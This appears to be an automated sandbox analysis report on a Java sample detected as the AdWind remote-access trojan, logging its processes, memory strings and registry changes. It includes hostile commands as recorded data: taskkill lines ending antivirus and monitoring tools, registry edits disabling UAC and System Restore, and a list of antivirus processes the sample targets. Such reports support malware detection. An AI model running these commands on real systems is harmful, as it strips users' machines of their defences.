Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c regedit.exe /s C:\Users\user\AppData\Local\Temp\mqjqrgZaqQ856862126040995288.reg Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: unknown unknown Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive2729271214941122137.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\cmd.exe cmd.exe /C cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6922435490390475939.vbs Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Process created: C:\Windows\SysWOW64\xcopy.exe xcopy "C:\Program Files (x86)\Java\jre-1.8" "C:\Users\user\AppData\Roaming\Oracle\" /e Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive4451837785175678294.vbs Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive2729271214941122137.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive536118811270301171.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cscript.exe cscript.exe C:\Users\user\AppData\Local\Temp\Retrive6922435490390475939.vbs
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\regedit.exe regedit.exe /s C:\Users\user\AppData\Local\Temp\mqjqrgZaqQ856862126040995288.reg
Uses taskkill to terminate processes
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM UserAccountControlSettings.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ProcessHacker.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MSASCui.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MsMpEng.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpUXSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM MpCmdRun.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM NisSrv.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM ConfigSecurityPolicy.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM procexp.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM wireshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM tshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM text2pcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM rawshark.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mergecap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM editcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM dumpcap.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM capinfos.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbam.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamscheduler.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM mbamservice.exe /T /F Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /IM AdAwareService.exe /T /F Jump to behavior
Source: javaw.exe, 00000006.00000002.2840070588.0000000005027000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2840070588.00000000051A5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: F{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
Source: javaw.exe, 00000006.00000002.2840070588.0000000005027000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2840070588.00000000051A5000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A996000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager
Source: javaw.exe, 00000006.00000002.2840070588.00000000051A5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Managereo.inf
Source: javaw.exe, 00000006.00000002.2840070588.00000000051F2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: Program Manager[c
Source: javaw.exe, 00000006.00000002.2840070588.00000000051F2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: {"ACTIVE_WINDOW":"Program Manager","COMMAND":5}BOX":false,"RAM":"8.0 GB"}cc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Us+
Source: javaw.exe, 00000006.00000002.2840070588.0000000005529000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2840070588.0000000005027000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2846518429.000000000A9E0000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}
Source: javaw.exe, 00000006.00000002.2840070588.00000000051F2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: /{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}S-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","FortiProxy.exe","FortiSSLVPNdaemon.exe","FortiTray.exe","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\ultekbvsw.txt","VBOX":false,"RAM":"8.0 GB"}"],"NAME":"VIPRE Security 2015"},{"PROCESS":["bavhm.exe","BavSvc.exe","BavTray.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCShi
Source: javaw.exe, 00000006.00000002.2840070588.00000000051F2000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: t/{"ACTIVE_WINDOW":"Program Manager","COMMAND":5}S-Uninstall.exe"],"NAME":"MCShield Anti-Malware Tool"},{"PROCESS":["SDScan.exe","SDFSSvc.exe","SDWelcome.exe","SDTray.exe"],"NAME":"SPYBOT AntiMalware"},{"PROCESS":["UnThreat.exe","utsvc.exe"],"NAME":"UnThreat Antivirus"},{"PROCESS":["FortiClient.exe","fcappdb.exe","FCDBlog.exe","FCHelper64.exe","fmon.exe","FortiESNAC.exe","FortiProxy.exe","FortiSSLVPNdaemon.exe","FortiTray.exe","FortiFW.exe","FortiClient_Diagnostic_Tool.exe","av_task.exe"],"NAME":"FortiClient"},{"PROCESS":["CertReg.exe","FilMsg.exe","FilUp.exe","filwscc.exe","filwscc.exe","psview.exe","quamgr.exe","quamgr.exe","schmgr.exe","schmgr.exe","twsscan.exe","twssrv.exe","UserReg.exe"],"NAME":"Twister Antivirus"}],"DELAY_CONNECT":2,"SERVER_PATH":"C:\\Users\\user\\AppData\\Roaming\\ultekbvsw.txt","VBOX":false,"RAM":"8.0 GB"}"],"NAME":"VIPRE Security 2015"},{"PROCESS":["bavhm.exe","BavSvc.exe","BavTray.exe","Bav.exe","BavWebClient.exe","BavUpdater.exe"],"NAME":"Baidu Antivirus 2015"},{"PROCESS":["MCShi
Source: javaw.exe, 00000006.00000002.2840070588.0000000005027000.00000004.00000800.00020000.00000000.sdmp, javaw.exe, 00000006.00000002.2840070588.00000000051A5000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: "{"ACTIVE_WINDOW":"Program Manager"
Contains functionality to query CPU information (cpuid)
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Code function: 2_2_01F803C0 cpuid 2_2_01F803C0
Queries the installed Java version
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\JavaSoft\Java Runtime Environment CurrentVersion Jump to behavior
Queries the volume information (name, serial number etc) of a device
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7340 VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Users\user\AppData\Local\Temp\jartracer.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7516 VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\client\jvm.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\bin\java.dll VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Users\user\AppData\Local\Temp\hsperfdata_user\7572 VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\resources.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\rt.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jsse.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jce.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\charsets.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\jfr.jar VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\java.exe Queries volume information: C:\Program Files (x86)\Java\jre-1.8\lib\meta-index VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Code function: 6_2_73AC3DFC GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter, 6_2_73AC3DFC
Source: C:\Windows\SysWOW64\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Lowering of HIPS / PFW / Operating System Security Settings
barindex
Disable UAC(promptonsecuredesktop)
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: PromptOnSecureDesktop 0
Disables UAC (registry)
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
Disables Windows system restore
Source: C:\Windows\SysWOW64\regedit.exe Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows NT\SystemRestore DisableSR
Disables zone checking for all users
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: HKEY_CURRENT_USER\Environment SEE_MASK_NOZONECHECKS
AV process strings found (often used to terminate AV products)
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: EMLPROXY.EXE
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AVKService.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: fsgk32.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AVKProxy.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: AVKTray.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBAMTray.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7RTScan.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FSMA32.EXE
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ONLINENT.EXE
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SCANWSCS.EXE
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SUPERAntiSpyware.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7FWSrvc.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: guardxservice.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7TSecurity.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7PSSrvc.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: MSASCui.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: acs.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7TSMngr.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: BullGuard.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: wireshark.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: virusutilities.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: K7EmlPxy.EXE
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ClamTray.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: SBAMSvc.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: procexp.exe
Source: cscript.exe, 0000000B.00000002.1693993699.0000000002C41000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000003.1692873411.0000000002C40000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000003.1692580802.0000000002C27000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000B.00000003.1692448880.0000000002C58000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000E.00000003.1693320557.00000000029B6000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000E.00000002.1694166431.0000000002978000.00000004.00000020.00020000.00000000.sdmp, cscript.exe, 0000000E.00000003.1693350866.0000000002975000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FPAVServer.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: mbam.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: QUHLPSVC.EXE
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: FProtTray.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: ClamWin.exe
Source: javaw.exe, 00000006.00000002.2846518429.000000000A7E9000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: op_mon.exe
Add executable type to lowriskfiletypes to avoid warning prompt
Source: C:\Windows\SysWOW64\regedit.exe Registry value created: LowRiskFileTypes .avi;.bat;.com;.cmd;.exe;.htm;.html;.lnk;.mpg;.mpeg;.mov;.mp3;.msi;.m3u;.rar;.reg;.txt;.vbs;.wav;.zip;.jar;
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Windows\SysWOW64\cscript.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
Source: C:\Windows\SysWOW64\cscript.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
Source: C:\Windows\SysWOW64\cscript.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from FirewallProduct
Source: C:\Windows\SysWOW64\cscript.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from FirewallProduct
Source: C:\Windows\SysWOW64\taskkill.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntiVirusProduct
Source: C:\Windows\System32\conhost.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from FirewallProduct

Stealing of Sensitive Information
barindex
Yara detected AdWind RATs dll
Source: Yara match File source: 6.2.javaw.exe.73ac0000.3.unpack, type: UNPACKEDPE
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\Windows266478547194213581.dll, type: DROPPED

Remote Access Functionality
barindex
Detected ADWIND Rat
Source: C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe Dropped file: Set oWMI = GetObject("winmgmts:{impersonationLevel=impersonate}!\\.\root\SecurityCenter2")Set colItems = oWMI.ExecQuery("Select * from FirewallProduct")For Each objItem in colItems With objItem WScript.Echo "{""FIREWALL"":""" & .displayName & """}" End WithNext Jump to dropped file
